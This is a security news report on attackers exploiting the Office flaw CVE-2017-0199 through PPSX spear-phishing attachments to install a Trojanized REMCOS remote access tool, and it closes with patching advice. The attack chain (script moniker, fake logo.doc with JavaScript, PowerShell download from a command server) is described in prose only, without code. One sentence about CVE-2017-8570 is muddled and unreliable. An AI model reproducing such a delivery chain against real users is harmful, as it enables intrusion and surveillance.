Security researchers from Trend Macro warn that a Microsoft Office vulnerability patched in April, has been exploited for RAT distribution.
Initially, the zero-day remote code execution vulnerability tracked as CVE-2017-0199, was used in attacks leveraging malicious Rich Text File (RTF) documents, exploiting a flaw in Office’s Object Linking and Embedding (OLE) interface to install malware like the DRIDEX banking Trojan, for istance.
However, in the latest malware attacks CVE-2017-0199 is being exploited using another method for delivering malware – via PowerPoint Slide Show. In this case, the infected file is attached to a spear-phishing email attachment where the address of the sender is disguised as one of a business partner.
Usually, the email message is an order request, though it includes no business documents. Nevertheless, the email features a malicious PowerPoint Show (PPSX file) which is supposed to leverage CVE-2017-8570, a different Microsoft Office vulnerability, is usually an error which the toolkit developer has made.
As soon as the malicious file is executed, PowerPoint initializes the script moniker and runs the remote malicious payload via the PowerPoint Show animations feature. Being exploited successfully, the CVE-2017-0199 vulnerability downloads a file called logo.doc, which is instead an XML file with JavaScript code.
After that, the JavaScript runs a PowerShell command in order to download and execute RATMAN.EXE from its command and control (C&C) server. The file is a Trojanized version of the REMCOS legitimate and customizable remote access tool (RAT) which once executed, offers the hacker an opportunity to run remote commands on the user’s system.
The tool can be used for downloading and executing commands on the infected machine, for logging keystrokes and screen activity, as well as for recording audio and video using the system’s microphone and webcam.
What the Trojanized tool uses is an unknown .NET protector for adding extra protection and obfuscation to hinder analysis and to leverage encrypted communication.
“Ultimately, the use of a new method of attack is a practical consideration; since most detection methods for CVE-2017-0199 focuses on the RTF method of attack, the use of a new vector—PPSX files—allows attackers to evade antivirus detection,” Trend Micro researchers say.
In addition, the experts point out that, “Users should also always patch their systems with the latest security updates. Given that Microsoft already addressed this vulnerability back in April, users with updated patches are safe from these attacks.”
